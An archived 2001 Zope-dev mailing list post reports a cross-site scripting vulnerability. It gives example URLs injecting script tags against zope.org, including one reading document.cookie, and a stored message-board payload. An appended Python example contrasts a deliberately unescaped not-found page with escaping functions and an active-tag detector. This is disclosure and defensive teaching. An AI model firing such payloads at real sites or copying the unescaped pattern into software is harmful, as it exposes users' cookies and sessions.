[Zope-dev] New: Cross Site Scripting vulnerability
"ALife" <buginfo@inbox.ru>
Sun, 23 Sep 2001 17:23:32 +0000 (GMT)
Example:
http://www.zope.org/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/lalalalal<SCRIPT>alert(document.domain)</SCRIPT>
http://www.zope.org/<SCRIPT>alert(document.cookie)</SCRIPT>
For example, an attacker might post a message like
Hello message board. This is a message.
<SCRIPT>malicious code</SCRIPT>
This is the end of my message.
When a victim with scripts enabled in their browser reads this
message, the malicious code may be executed unexpectedly.
Scripting tags that can be embedded in this way include <SCRIPT>,
<OBJECT>, <APPLET>, and <EMBED>.
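
The defence against both cases in the message above is output encoding. The following is an added example, not part of the original post and not Zope's own code: it assumes a hypothetical not-found page that echoes the requested path and a hypothetical message-board renderer, and all function names are illustrative.

```python
import html
from urllib.parse import unquote

PAGE = "<html><body><p>Resource not found: %s</p></body></html>"
ACTIVE_TAGS = ("<script", "<object", "<applet", "<embed")  # tags named in the post


def not_found_page_unsafe(path: str) -> str:
    """Deliberately vulnerable: the decoded request path is echoed as raw HTML."""
    return PAGE % unquote(path)


def not_found_page_safe(path: str) -> str:
    """Hardened: decode first, then HTML-escape, so encoded brackets are covered too."""
    return PAGE % html.escape(unquote(path), quote=True)


def render_post_safe(body: str) -> str:
    """Message-board case: escape stored user text when it is written into the page."""
    lines = html.escape(body, quote=True).splitlines()
    return '<div class="post">%s</div>' % "<br>".join(lines)


def contains_active_tag(markup: str) -> bool:
    """Check rendered output for a live opening tag from ACTIVE_TAGS."""
    lowered = markup.lower()
    return any(tag in lowered for tag in ACTIVE_TAGS)


# Inputs taken from the post above; the percent-encoded variant is constructed.
REQUEST_PATH = "/Documentation/<SCRIPT>alert(document.domain)</SCRIPT>"
ENCODED_PATH = "/Documentation/%3CSCRIPT%3Ealert(document.domain)%3C/SCRIPT%3E"
POST_BODY = (
    "Hello message board. This is a message.\n"
    "<SCRIPT>malicious code</SCRIPT>\n"
    "This is the end of my message."
)

if __name__ == "__main__":
    for label, page in [
        ("unsafe 404", not_found_page_unsafe(REQUEST_PATH)),
        ("safe 404", not_found_page_safe(REQUEST_PATH)),
        ("safe 404 (encoded path)", not_found_page_safe(ENCODED_PATH)),
        ("safe post", render_post_safe(POST_BODY)),
    ]:
        print("%-24s live tag: %s" % (label, contains_active_tag(page)))
```

Escaping is applied at the point of output, after URL decoding, which is why the percent-encoded path is rendered inert as well.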